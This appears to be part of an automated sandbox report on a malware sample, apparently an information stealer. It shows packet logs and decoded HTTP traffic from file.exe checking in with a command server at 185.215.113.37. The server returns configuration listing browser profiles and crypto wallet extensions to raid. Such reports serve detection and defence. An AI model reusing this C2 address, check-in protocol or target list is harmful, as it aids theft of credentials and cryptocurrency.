Sep 26, 2024 11:33:36.822659016 CEST	80	49705	185.215.113.37	192.168.2.9
Sep 26, 2024 11:33:36.822664976 CEST	80	49705	185.215.113.37	192.168.2.9
Sep 26, 2024 11:33:36.822670937 CEST	80	49705	185.215.113.37	192.168.2.9
Sep 26, 2024 11:33:36.822679043 CEST	49705	80	192.168.2.9	185.215.113.37
Sep 26, 2024 11:33:36.822681904 CEST	80	49705	185.215.113.37	192.168.2.9
Sep 26, 2024 11:33:36.822700977 CEST	49705	80	192.168.2.9	185.215.113.37
Sep 26, 2024 11:33:36.822727919 CEST	49705	80	192.168.2.9	185.215.113.37
Sep 26, 2024 11:33:36.822845936 CEST	80	49705	185.215.113.37	192.168.2.9
Sep 26, 2024 11:33:36.822851896 CEST	80	49705	185.215.113.37	192.168.2.9
Sep 26, 2024 11:33:36.822859049 CEST	80	49705	185.215.113.37	192.168.2.9
Sep 26, 2024 11:33:36.822896004 CEST	49705	80	192.168.2.9	185.215.113.37
Sep 26, 2024 11:33:36.822901964 CEST	80	49705	185.215.113.37	192.168.2.9
Sep 26, 2024 11:33:36.822907925 CEST	80	49705	185.215.113.37	192.168.2.9
Sep 26, 2024 11:33:36.822911024 CEST	49705	80	192.168.2.9	185.215.113.37
Sep 26, 2024 11:33:36.822915077 CEST	80	49705	185.215.113.37	192.168.2.9
Sep 26, 2024 11:33:36.822942019 CEST	49705	80	192.168.2.9	185.215.113.37
Sep 26, 2024 11:33:36.822968006 CEST	80	49705	185.215.113.37	192.168.2.9
Sep 26, 2024 11:33:36.822968960 CEST	49705	80	192.168.2.9	185.215.113.37
Sep 26, 2024 11:33:36.822974920 CEST	80	49705	185.215.113.37	192.168.2.9
Sep 26, 2024 11:33:36.822987080 CEST	80	49705	185.215.113.37	192.168.2.9
Sep 26, 2024 11:33:36.822993040 CEST	80	49705	185.215.113.37	192.168.2.9
Sep 26, 2024 11:33:36.823015928 CEST	49705	80	192.168.2.9	185.215.113.37
Sep 26, 2024 11:33:36.823041916 CEST	49705	80	192.168.2.9	185.215.113.37
Sep 26, 2024 11:33:36.823054075 CEST	80	49705	185.215.113.37	192.168.2.9
Sep 26, 2024 11:33:36.823059082 CEST	80	49705	185.215.113.37	192.168.2.9
Sep 26, 2024 11:33:36.823071003 CEST	80	49705	185.215.113.37	192.168.2.9
Sep 26, 2024 11:33:36.823085070 CEST	80	49705	185.215.113.37	192.168.2.9
Sep 26, 2024 11:33:36.823096991 CEST	80	49705	185.215.113.37	192.168.2.9
Sep 26, 2024 11:33:36.823108912 CEST	49705	80	192.168.2.9	185.215.113.37
Sep 26, 2024 11:33:36.823141098 CEST	49705	80	192.168.2.9	185.215.113.37
Sep 26, 2024 11:33:36.823200941 CEST	80	49705	185.215.113.37	192.168.2.9
Sep 26, 2024 11:33:36.823206902 CEST	80	49705	185.215.113.37	192.168.2.9
Sep 26, 2024 11:33:36.823220015 CEST	80	49705	185.215.113.37	192.168.2.9
Sep 26, 2024 11:33:36.823225021 CEST	80	49705	185.215.113.37	192.168.2.9
Sep 26, 2024 11:33:36.823235989 CEST	80	49705	185.215.113.37	192.168.2.9
Sep 26, 2024 11:33:36.823240995 CEST	80	49705	185.215.113.37	192.168.2.9
Sep 26, 2024 11:33:36.823246002 CEST	49705	80	192.168.2.9	185.215.113.37
Sep 26, 2024 11:33:36.823261023 CEST	49705	80	192.168.2.9	185.215.113.37
Sep 26, 2024 11:33:36.823271036 CEST	80	49705	185.215.113.37	192.168.2.9
Sep 26, 2024 11:33:36.823276997 CEST	80	49705	185.215.113.37	192.168.2.9
Sep 26, 2024 11:33:36.823282957 CEST	80	49705	185.215.113.37	192.168.2.9
Sep 26, 2024 11:33:36.823286057 CEST	49705	80	192.168.2.9	185.215.113.37
Sep 26, 2024 11:33:36.823312044 CEST	49705	80	192.168.2.9	185.215.113.37
Sep 26, 2024 11:33:36.823345900 CEST	80	49705	185.215.113.37	192.168.2.9
Sep 26, 2024 11:33:36.823350906 CEST	80	49705	185.215.113.37	192.168.2.9
Sep 26, 2024 11:33:36.823363066 CEST	80	49705	185.215.113.37	192.168.2.9
Sep 26, 2024 11:33:36.823368073 CEST	80	49705	185.215.113.37	192.168.2.9
Sep 26, 2024 11:33:36.823374033 CEST	80	49705	185.215.113.37	192.168.2.9
Sep 26, 2024 11:33:36.823404074 CEST	49705	80	192.168.2.9	185.215.113.37
Sep 26, 2024 11:33:36.823404074 CEST	49705	80	192.168.2.9	185.215.113.37
Sep 26, 2024 11:33:36.823415041 CEST	80	49705	185.215.113.37	192.168.2.9
Sep 26, 2024 11:33:36.823419094 CEST	80	49705	185.215.113.37	192.168.2.9
Sep 26, 2024 11:33:36.823457003 CEST	49705	80	192.168.2.9	185.215.113.37
Sep 26, 2024 11:33:37.309319019 CEST	49705	80	192.168.2.9	185.215.113.37
Sep 26, 2024 11:33:37.309428930 CEST	49705	80	192.168.2.9	185.215.113.37
Sep 26, 2024 11:33:37.314126968 CEST	80	49705	185.215.113.37	192.168.2.9
Sep 26, 2024 11:33:37.314208984 CEST	80	49705	185.215.113.37	192.168.2.9
Sep 26, 2024 11:33:38.211225986 CEST	80	49705	185.215.113.37	192.168.2.9
Sep 26, 2024 11:33:38.211821079 CEST	49705	80	192.168.2.9	185.215.113.37
Sep 26, 2024 11:33:38.285521030 CEST	49705	80	192.168.2.9	185.215.113.37
Sep 26, 2024 11:33:38.290311098 CEST	80	49705	185.215.113.37	192.168.2.9
Sep 26, 2024 11:33:38.505789995 CEST	80	49705	185.215.113.37	192.168.2.9
Sep 26, 2024 11:33:38.505809069 CEST	80	49705	185.215.113.37	192.168.2.9
Sep 26, 2024 11:33:38.505822897 CEST	80	49705	185.215.113.37	192.168.2.9
Sep 26, 2024 11:33:38.505964041 CEST	49705	80	192.168.2.9	185.215.113.37
Sep 26, 2024 11:33:38.508266926 CEST	49705	80	192.168.2.9	185.215.113.37
Sep 26, 2024 11:33:38.513076067 CEST	80	49705	185.215.113.37	192.168.2.9
Sep 26, 2024 11:33:38.731199026 CEST	80	49705	185.215.113.37	192.168.2.9
Sep 26, 2024 11:33:38.731215000 CEST	80	49705	185.215.113.37	192.168.2.9
Sep 26, 2024 11:33:38.731226921 CEST	80	49705	185.215.113.37	192.168.2.9
Sep 26, 2024 11:33:38.731261015 CEST	80	49705	185.215.113.37	192.168.2.9
Sep 26, 2024 11:33:38.731272936 CEST	80	49705	185.215.113.37	192.168.2.9
Sep 26, 2024 11:33:38.731281042 CEST	49705	80	192.168.2.9	185.215.113.37
Sep 26, 2024 11:33:38.731282949 CEST	80	49705	185.215.113.37	192.168.2.9
Sep 26, 2024 11:33:38.731343031 CEST	49705	80	192.168.2.9	185.215.113.37
Sep 26, 2024 11:33:38.744513988 CEST	49705	80	192.168.2.9	185.215.113.37
Sep 26, 2024 11:33:38.749357939 CEST	80	49705	185.215.113.37	192.168.2.9
Sep 26, 2024 11:33:39.463356972 CEST	80	49705	185.215.113.37	192.168.2.9
Sep 26, 2024 11:33:39.463478088 CEST	49705	80	192.168.2.9	185.215.113.37
Sep 26, 2024 11:33:39.466260910 CEST	49705	80	192.168.2.9	185.215.113.37
Sep 26, 2024 11:33:39.470999956 CEST	80	49705	185.215.113.37	192.168.2.9
Sep 26, 2024 11:33:39.687829018 CEST	80	49705	185.215.113.37	192.168.2.9
Sep 26, 2024 11:33:39.687927961 CEST	49705	80	192.168.2.9	185.215.113.37
Sep 26, 2024 11:33:39.688853025 CEST	49705	80	192.168.2.9	185.215.113.37
Sep 26, 2024 11:33:39.693620920 CEST	80	49705	185.215.113.37	192.168.2.9
Sep 26, 2024 11:33:40.417465925 CEST	80	49705	185.215.113.37	192.168.2.9
Sep 26, 2024 11:33:40.417582989 CEST	49705	80	192.168.2.9	185.215.113.37
Sep 26, 2024 11:33:45.418075085 CEST	80	49705	185.215.113.37	192.168.2.9
Sep 26, 2024 11:33:45.418196917 CEST	49705	80	192.168.2.9	185.215.113.37
Sep 26, 2024 11:33:45.927095890 CEST	49705	80	192.168.2.9	185.215.113.37

HTTP Request Dependency Graph

185.215.113.37

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.9	49705	185.215.113.37	80	1272	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
Sep 26, 2024 11:33:23.587415934 CEST	89	OUT	GET / HTTP/1.1 Host: 185.215.113.37 Connection: Keep-Alive Cache-Control: no-cache
Sep 26, 2024 11:33:24.284938097 CEST	203	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 09:33:24 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Sep 26, 2024 11:33:24.289377928 CEST	412	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----KJKEHIIJJECFHJKECFHD Host: 185.215.113.37 Content-Length: 211 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 4b 4a 4b 45 48 49 49 4a 4a 45 43 46 48 4a 4b 45 43 46 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 31 41 30 43 35 35 34 38 31 34 42 33 38 33 37 37 33 34 39 34 37 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 4b 45 48 49 49 4a 4a 45 43 46 48 4a 4b 45 43 46 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 73 61 76 65 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 4b 45 48 49 49 4a 4a 45 43 46 48 4a 4b 45 43 46 48 44 2d 2d 0d 0a Data Ascii: ------KJKEHIIJJECFHJKECFHDContent-Disposition: form-data; name="hwid"A1A0C554814B3837734947------KJKEHIIJJECFHJKECFHDContent-Disposition: form-data; name="build"save------KJKEHIIJJECFHJKECFHD--
Sep 26, 2024 11:33:24.532283068 CEST	407	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 09:33:24 GMT Server: Apache/2.4.52 (Ubuntu) Vary: Accept-Encoding Content-Length: 180 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 4d 6a 56 69 4e 54 4d 32 4d 44 55 77 4f 44 45 33 4d 57 49 31 5a 54 4e 69 4f 44 51 34 5a 44 64 69 4e 7a 67 78 4f 47 5a 6a 5a 47 49 31 59 54 41 79 5a 47 55 30 4d 44 4d 77 5a 47 55 35 4e 7a 5a 6a 4d 7a 4e 68 5a 44 56 6d 5a 57 45 79 59 7a 55 31 59 54 46 69 4f 57 52 6b 5a 44 55 78 4f 47 49 33 66 48 64 72 61 32 70 78 59 57 6c 68 65 47 74 6f 59 6e 78 7a 62 57 70 73 62 47 31 35 62 57 78 69 65 6e 45 75 63 48 64 6b 66 44 42 38 4d 48 77 78 66 44 46 38 4d 58 77 78 66 44 46 38 4d 58 77 78 66 48 6c 69 62 6d 4e 69 61 48 6c 73 5a 58 42 74 5a 58 77 3d Data Ascii: MjViNTM2MDUwODE3MWI1ZTNiODQ4ZDdiNzgxOGZjZGI1YTAyZGU0MDMwZGU5NzZjMzNhZDVmZWEyYzU1YTFiOWRkZDUxOGI3fHdra2pxYWlheGtoYnxzbWpsbG15bWxienEucHdkfDB8MHwxfDF8MXwxfDF8MXwxfHlibmNiaHlsZXBtZXw=
Sep 26, 2024 11:33:24.534288883 CEST	469	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----IDBGHDGHCGHCAAKFIIEC Host: 185.215.113.37 Content-Length: 268 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 49 44 42 47 48 44 47 48 43 47 48 43 41 41 4b 46 49 49 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 35 62 35 33 36 30 35 30 38 31 37 31 62 35 65 33 62 38 34 38 64 37 62 37 38 31 38 66 63 64 62 35 61 30 32 64 65 34 30 33 30 64 65 39 37 36 63 33 33 61 64 35 66 65 61 32 63 35 35 61 31 62 39 64 64 64 35 31 38 62 37 0d 0a 2d 2d 2d 2d 2d 2d 49 44 42 47 48 44 47 48 43 47 48 43 41 41 4b 46 49 49 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 49 44 42 47 48 44 47 48 43 47 48 43 41 41 4b 46 49 49 45 43 2d 2d 0d 0a Data Ascii: ------IDBGHDGHCGHCAAKFIIECContent-Disposition: form-data; name="token"25b5360508171b5e3b848d7b7818fcdb5a02de4030de976c33ad5fea2c55a1b9ddd518b7------IDBGHDGHCGHCAAKFIIECContent-Disposition: form-data; name="message"browsers------IDBGHDGHCGHCAAKFIIEC--
Sep 26, 2024 11:33:24.754513979 CEST	1236	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 09:33:24 GMT Server: Apache/2.4.52 (Ubuntu) Vary: Accept-Encoding Content-Length: 1520 Keep-Alive: timeout=5, max=98 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 47 4e 6f 63 6d 39 74 5a 53 35 6c 65 47 56 38 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 53 42 44 59 57 35 68 63 6e 6c 38 58 45 64 76 62 32 64 73 5a 56 78 44 61 48 4a 76 62 57 55 67 55 33 68 54 58 46 56 7a 5a 58 49 67 52 47 46 30 59 58 78 6a 61 48 4a 76 62 57 56 38 59 32 68 79 62 32 31 6c 4c 6d 56 34 5a 58 78 44 61 48 4a 76 62 57 6c 31 62 58 78 63 51 32 68 79 62 32 31 70 64 57 31 63 56 58 4e 6c 63 69 42 45 59 58 52 68 66 47 4e 6f 63 6d 39 74 5a 58 78 6a 61 48 4a 76 62 57 55 75 5a 58 68 6c 66 45 46 74 61 57 64 76 66 46 78 42 62 57 6c 6e 62 31 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 44 42 38 56 47 39 79 59 32 68 38 58 46 52 76 63 6d 4e 6f 58 46 56 7a 5a 58 49 67 52 47 46 30 59 58 78 6a 61 48 4a 76 62 57 56 38 4d 48 78 57 61 58 5a 68 62 47 52 70 66 46 78 57 61 58 5a 68 62 47 52 70 58 46 [TRUNCATED] Data Ascii: R29vZ2xlIENocm9tZXxcR29vZ2xlXENocm9tZVxVc2VyIERhdGF8Y2hyb21lfGNocm9tZS5leGV8R29vZ2xlIENocm9tZSBDYW5hcnl8XEdvb2dsZVxDaHJvbWUgU3hTXFVzZXIgRGF0YXxjaHJvbWV8Y2hyb21lLmV4ZXxDaHJvbWl1bXxcQ2hyb21pdW1cVXNlciBEYXRhfGNocm9tZXxjaHJvbWUuZXhlfEFtaWdvfFxBbWlnb1xVc2VyIERhdGF8Y2hyb21lfDB8VG9yY2h8XFRvcmNoXFVzZXIgRGF0YXxjaHJvbWV8MHxWaXZhbGRpfFxWaXZhbGRpXFVzZXIgRGF0YXxjaHJvbWV8dml2YWxkaS5leGV8Q29tb2RvIERyYWdvbnxcQ29tb2RvXERyYWdvblxVc2VyIERhdGF8Y2hyb21lfDB8RXBpY1ByaXZhY3lCcm93c2VyfFxFcGljIFByaXZhY3kgQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfDB8Q29jQ29jfFxDb2NDb2NcQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfDB8QnJhdmV8XEJyYXZlU29mdHdhcmVcQnJhdmUtQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfGJyYXZlLmV4ZXxDZW50IEJyb3dzZXJ8XENlbnRCcm93c2VyXFVzZXIgRGF0YXxjaHJvbWV8MHw3U3RhcnxcN1N0YXJcN1N0YXJcVXNlciBEYXRhfGNocm9tZXwwfENoZWRvdCBCcm93c2VyfFxDaGVkb3RcVXNlciBEYXRhfGNocm9tZXwwfE1pY3Jvc29mdCBFZGdlfFxNaWNyb3NvZnRcRWRnZVxVc2VyIERhdGF8Y2hyb21lfG1zZWRnZS5leGV8MzYwIEJyb3dzZXJ8XDM2MEJyb3dzZXJcQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfDB8UVFCcm93c2VyfFxUZW5jZW50XFFRQnJvd3Nl
Sep 26, 2024 11:33:24.754528999 CEST	512	IN	Data Raw: 63 6c 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 44 42 38 51 33 4a 35 63 48 52 76 56 47 46 69 66 46 78 44 63 6e 6c 77 64 47 39 55 59 57 49 67 51 6e 4a 76 64 33 4e 6c 63 6c 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 Data Ascii: clxVc2VyIERhdGF8Y2hyb21lfDB8Q3J5cHRvVGFifFxDcnlwdG9UYWIgQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfGJyb3dzZXIuZXhlfE9wZXJhIFN0YWJsZXxcT3BlcmEgU29mdHdhcmV8b3BlcmF8b3BlcmEuZXhlfE9wZXJhIEdYIFN0YWJsZXxcT3BlcmEgU29mdHdhcmV8b3BlcmF8b3BlcmEuZXhlfE1vemlsbGEgRml
Sep 26, 2024 11:33:24.756417990 CEST	468	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----CFIEHCFIECBGCBFHIJJK Host: 185.215.113.37 Content-Length: 267 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 43 46 49 45 48 43 46 49 45 43 42 47 43 42 46 48 49 4a 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 35 62 35 33 36 30 35 30 38 31 37 31 62 35 65 33 62 38 34 38 64 37 62 37 38 31 38 66 63 64 62 35 61 30 32 64 65 34 30 33 30 64 65 39 37 36 63 33 33 61 64 35 66 65 61 32 63 35 35 61 31 62 39 64 64 64 35 31 38 62 37 0d 0a 2d 2d 2d 2d 2d 2d 43 46 49 45 48 43 46 49 45 43 42 47 43 42 46 48 49 4a 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 43 46 49 45 48 43 46 49 45 43 42 47 43 42 46 48 49 4a 4a 4b 2d 2d 0d 0a Data Ascii: ------CFIEHCFIECBGCBFHIJJKContent-Disposition: form-data; name="token"25b5360508171b5e3b848d7b7818fcdb5a02de4030de976c33ad5fea2c55a1b9ddd518b7------CFIEHCFIECBGCBFHIJJKContent-Disposition: form-data; name="message"plugins------CFIEHCFIECBGCBFHIJJK--
Sep 26, 2024 11:33:24.978470087 CEST	1236	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 09:33:24 GMT Server: Apache/2.4.52 (Ubuntu) Vary: Accept-Encoding Content-Length: 7116 Keep-Alive: timeout=5, max=97 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 54 57 56 30 59 55 31 68 63 32 74 38 5a 47 70 6a 62 47 4e 72 61 32 64 73 5a 57 4e 6f 62 32 39 69 62 47 35 6e 5a 32 68 6b 61 57 35 74 5a 57 56 74 61 32 4a 6e 59 32 6c 38 4d 58 77 77 66 44 42 38 54 57 56 30 59 55 31 68 63 32 74 38 5a 57 70 69 59 57 78 69 59 57 74 76 63 47 78 6a 61 47 78 6e 61 47 56 6a 5a 47 46 73 62 57 56 6c 5a 57 46 71 62 6d 6c 74 61 47 31 38 4d 58 77 77 66 44 42 38 54 57 56 30 59 55 31 68 63 32 74 38 62 6d 74 69 61 57 68 6d 59 6d 56 76 5a 32 46 6c 59 57 39 6c 61 47 78 6c 5a 6d 35 72 62 32 52 69 5a 57 5a 6e 63 47 64 72 62 6d 35 38 4d 58 77 77 66 44 42 38 56 48 4a 76 62 6b 78 70 62 6d 74 38 61 57 4a 75 5a 57 70 6b 5a 6d 70 74 62 57 74 77 59 32 35 73 63 47 56 69 61 32 78 74 62 6d 74 76 5a 57 39 70 61 47 39 6d 5a 57 4e 38 4d 58 77 77 66 44 42 38 51 6d 6c 75 59 57 35 6a 5a 53 42 58 59 57 78 73 5a 58 52 38 5a 6d 68 69 62 32 68 70 62 57 46 6c 62 47 4a 76 61 48 42 71 59 6d 4a 73 5a 47 4e 75 5a 32 4e 75 59 58 42 75 5a 47 39 6b 61 6e 42 38 4d 58 77 77 66 44 42 38 57 57 39 79 62 32 6c 38 5a 6d [TRUNCATED] Data Ascii: TWV0YU1hc2t8ZGpjbGNra2dsZWNob29ibG5nZ2hkaW5tZWVta2JnY2l8MXwwfDB8TWV0YU1hc2t8ZWpiYWxiYWtvcGxjaGxnaGVjZGFsbWVlZWFqbmltaG18MXwwfDB8TWV0YU1hc2t8bmtiaWhmYmVvZ2FlYW9laGxlZm5rb2RiZWZncGdrbm58MXwwfDB8VHJvbkxpbmt8aWJuZWpkZmptbWtwY25scGVia2xtbmtvZW9paG9mZWN8MXwwfDB8QmluYW5jZSBXYWxsZXR8Zmhib2hpbWFlbGJvaHBqYmJsZGNuZ2NuYXBuZG9kanB8MXwwfDB8WW9yb2l8ZmZuYmVsZmRvZWlvaGVua2ppYm5tYWRqaWVoamhhamJ8MXwwfDB8Q29pbmJhc2UgV2FsbGV0IGV4dGVuc2lvbnxobmZhbmtub2NmZW9mYmRkZ2Npam5taG5mbmtkbmFhZHwxfDB8MXxHdWFyZGF8aHBnbGZoZ2ZuaGJncGpkZW5qZ21kZ29laWFwcGFmbG58MXwwfDB8SmF4eCBMaWJlcnR5fGNqZWxmcGxwbGViZGpqZW5sbHBqY2JsbWprZmNmZm5lfDF8MHwwfGlXYWxsZXR8a25jY2hkaWdvYmdoZW5iYmFkZG9qam5uYW9nZnBwZmp8MXwwfDB8TUVXIENYfG5sYm1ubmlqY25sZWdrampwY2ZqY2xtY2ZnZ2ZlZmRtfDF8MHwwfEd1aWxkV2FsbGV0fG5hbmptZGtuaGtpbmlmbmtnZGNnZ2NmbmhkYWFtbW1qfDF8MHwwfFJvbmluIFdhbGxldHxmbmpobWtoaG1rYmpra2FibmRjbm5vZ2Fnb2dibmVlY3wxfDB8MHxOZW9MaW5lfGNwaGhsZ21nYW1lb2RuaGtqZG1rcGFubGVsbmxvaGFvfDF8MHwwfENMViBXYWxsZXR8bmhua2JrZ2ppa2djaWdhZG9ta3BoYWxhbm5kY2Fwamt8MXwwfDB8TGlxdWFsaXR5
Sep 26, 2024 11:33:24.978487015 CEST	1236	IN	Data Raw: 49 46 64 68 62 47 78 6c 64 48 78 72 63 47 5a 76 63 47 74 6c 62 47 31 68 63 47 4e 76 61 58 42 6c 62 57 5a 6c 62 6d 52 74 5a 47 4e 6e 61 47 35 6c 5a 32 6c 74 62 6e 77 78 66 44 42 38 4d 48 78 55 5a 58 4a 79 59 53 42 54 64 47 46 30 61 57 39 75 49 46 Data Ascii: IFdhbGxldHxrcGZvcGtlbG1hcGNvaXBlbWZlbmRtZGNnaG5lZ2ltbnwxfDB8MHxUZXJyYSBTdGF0aW9uIFdhbGxldHxhaWlmYm5iZm9icG1lZWtpcGhlZWlqaW1kcG5scGdwcHwxfDB8MHxLZXBscnxkbWthbWNrbm9na2djZGZoaGJkZGNnaGFjaGtlamVhcHwxfDB8MHxTb2xsZXR8ZmhtZmVuZGdkb2NtY2JtZmlrZGNvZ29
Sep 26, 2024 11:33:24.978498936 CEST	1236	IN	Data Raw: 66 47 52 75 5a 32 31 73 59 6d 78 6a 62 32 52 6d 62 32 4a 77 5a 48 42 6c 59 32 46 68 5a 47 64 6d 59 6d 4e 6e 5a 32 5a 71 5a 6d 35 74 66 44 46 38 4d 48 77 77 66 45 74 6c 5a 58 42 6c 63 69 42 58 59 57 78 73 5a 58 52 38 62 48 42 70 62 47 4a 75 61 57 Data Ascii: fGRuZ21sYmxjb2Rmb2JwZHBlY2FhZGdmYmNnZ2ZqZm5tfDF8MHwwfEtlZXBlciBXYWxsZXR8bHBpbGJuaWlhYmFja2RqY2lvbmtvYmdsbWRkZmJjam98MXwwfDB8U29sZmxhcmUgV2FsbGV0fGJoaGhsYmVwZGtiYXBhZGpkbm5vamtiZ2lvaW9kYmljfDF8MHwwfEN5YW5vIFdhbGxldHxka2RlZGxwZ2RtbWtrZmphYmZmZWd
Sep 26, 2024 11:33:24.978553057 CEST	1236	IN	Data Raw: 49 45 46 77 64 47 39 7a 49 46 64 68 62 47 78 6c 64 48 78 77 61 47 74 69 59 57 31 6c 5a 6d 6c 75 5a 32 64 74 59 57 74 6e 61 32 78 77 61 32 78 71 61 6d 31 6e 61 57 4a 76 61 47 35 69 59 58 77 78 66 44 42 38 4d 48 78 51 5a 58 52 79 59 53 42 42 63 48 Data Ascii: IEFwdG9zIFdhbGxldHxwaGtiYW1lZmluZ2dtYWtna2xwa2xqam1naWJvaG5iYXwxfDB8MHxQZXRyYSBBcHRvcyBXYWxsZXR8ZWpqbGFkaW5uY2tkZ2plbWVrZWJkcGVva2Jpa2hmY2l8MXwwfDB8TWFydGlhbiBBcHRvcyBXYWxsZXR8ZWZiZ2xnb2ZvaXBwYmdjamVwbmhpYmxhaWJjbmNsZ2t8MXwwfDB8RmlubmllfGNqbWt
Sep 26, 2024 11:33:24.978564024 CEST	1236	IN	Data Raw: 59 57 5a 6a 61 48 77 78 66 44 42 38 4d 48 78 4e 57 55 74 4a 66 47 4a 74 61 57 74 77 5a 32 39 6b 63 47 74 6a 62 47 35 72 5a 32 31 75 63 48 42 6f 5a 57 68 6b 5a 32 4e 70 62 57 31 70 5a 47 56 6b 66 44 46 38 4d 48 77 77 66 46 4e 77 62 47 6c 72 61 58 Data Ascii: YWZjaHwxfDB8MHxNWUtJfGJtaWtwZ29kcGtjbG5rZ21ucHBoZWhkZ2NpbW1pZGVkfDF8MHwwfFNwbGlraXR5fGpoZmpmY2xlcGFjb2xkbWpta21kbG1nYW5mYWFsa2xifDF8MHwwfENvbW1vbktleXxjaGdmZWZqcGNvYmZibnBtaW9rZmpqYWdsYWhtbmRlZHwxfDB8MHxab2hvIFZhdWx0fGlna3Bjb2RoaWVvbXBlbG9uY2Z
Sep 26, 2024 11:33:24.978574991 CEST	1164	IN	Data Raw: 56 32 46 73 62 47 56 30 66 47 68 6c 5a 57 5a 76 61 47 46 6d 5a 6d 39 74 61 32 74 72 63 47 68 75 62 48 42 76 61 47 64 73 62 6d 64 74 59 6d 4e 6a 62 47 68 70 66 44 46 38 4d 48 77 77 66 46 68 32 5a 58 4a 7a 5a 53 42 58 59 57 78 73 5a 58 52 38 61 57 Data Ascii: V2FsbGV0fGhlZWZvaGFmZm9ta2trcGhubHBvaGdsbmdtYmNjbGhpfDF8MHwwfFh2ZXJzZSBXYWxsZXR8aWRubmJkcGxtcGhwZmxmbmxrb21ncGZicGNnZWxvcGd8MXwwfDB8Q29tcGFzcyBXYWxsZXQgZm9yIFNlaXxhbm9rZ21waG5jcGVra2hjbG1pbmdwaW1qbWNvb2lmYnwxfDB8MHxIQVZBSCBXYWxsZXR8Y25uY21kaGp
Sep 26, 2024 11:33:24.980817080 CEST	469	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----AEBAFBGIDHCBFHIECFCB Host: 185.215.113.37 Content-Length: 268 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 41 45 42 41 46 42 47 49 44 48 43 42 46 48 49 45 43 46 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 35 62 35 33 36 30 35 30 38 31 37 31 62 35 65 33 62 38 34 38 64 37 62 37 38 31 38 66 63 64 62 35 61 30 32 64 65 34 30 33 30 64 65 39 37 36 63 33 33 61 64 35 66 65 61 32 63 35 35 61 31 62 39 64 64 64 35 31 38 62 37 0d 0a 2d 2d 2d 2d 2d 2d 41 45 42 41 46 42 47 49 44 48 43 42 46 48 49 45 43 46 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 70 6c 75 67 69 6e 73 